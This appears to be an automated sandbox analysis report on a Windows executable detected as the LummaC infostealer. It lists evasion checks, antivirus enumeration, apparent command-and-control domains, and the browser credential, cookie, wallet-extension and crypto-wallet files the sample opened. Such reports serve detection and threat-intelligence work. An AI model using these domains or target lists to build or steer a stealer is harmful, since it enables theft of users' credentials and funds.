Source: Ag3ijL3z1w.exe, 00000000.00000003.1705221839.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712321938.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000002.1875704776.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1873169366.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: Ag3ijL3z1w.exe, 00000000.00000002.1875504180.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe

Code function: 0_2_0013E70F rdtsc

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: associationokeo.shop
Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: turkeyunlikelyofw.shop
Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: pooreveningfuseor.pw
Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: edurestunningcrackyow.fun
Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: detectordiscusser.shop
Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: relevantvoicelesskw.shop
Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: colorfulequalugliess.shop
Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: wisemassiveharmonious.shop

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: Ag3ijL3z1w.exe, 00000000.00000003.1775315216.0000000003090000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1872387463.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000002.1877490419.0000000003093000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000002.1875704776.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1873169366.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Ag3ijL3z1w.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Ag3ijL3z1w.exe, 00000000.00000003.1712285462.0000000000B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "p": "%appdata%\\Electrum\\wallets",
Source: Ag3ijL3z1w.exe, 00000000.00000002.1877392777.0000000003070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Edge/Default/Extensions/Jaxx LibertyIEQ
Source: Ag3ijL3z1w.exe, 00000000.00000003.1712285462.0000000000B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "m": ["app-store.json", ".finger-print.fp", "simple-storage.json", "window-state.json"],
Source: Ag3ijL3z1w.exe, 00000000.00000003.1712285462.0000000000B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
Source: Ag3ijL3z1w.exe	String found in binary or memory: Edge/Default/Extensions/ExodusWeb3
Source: Ag3ijL3z1w.exe, 00000000.00000002.1875055252.0000000000788000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: Wallets/BinanceC:\Users\user\AppData\Roaming\Binance
Source: Ag3ijL3z1w.exe, 00000000.00000003.1712285462.0000000000B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "p": "%appdata%\\Ethereum",
Source: Ag3ijL3z1w.exe, 00000000.00000003.1873169366.0000000000A93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Ag3ijL3z1w.exe, 00000000.00000003.1712285462.0000000000B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "keystore"
Source: Ag3ijL3z1w.exe, 00000000.00000002.1875055252.0000000000788000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live+p2

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI
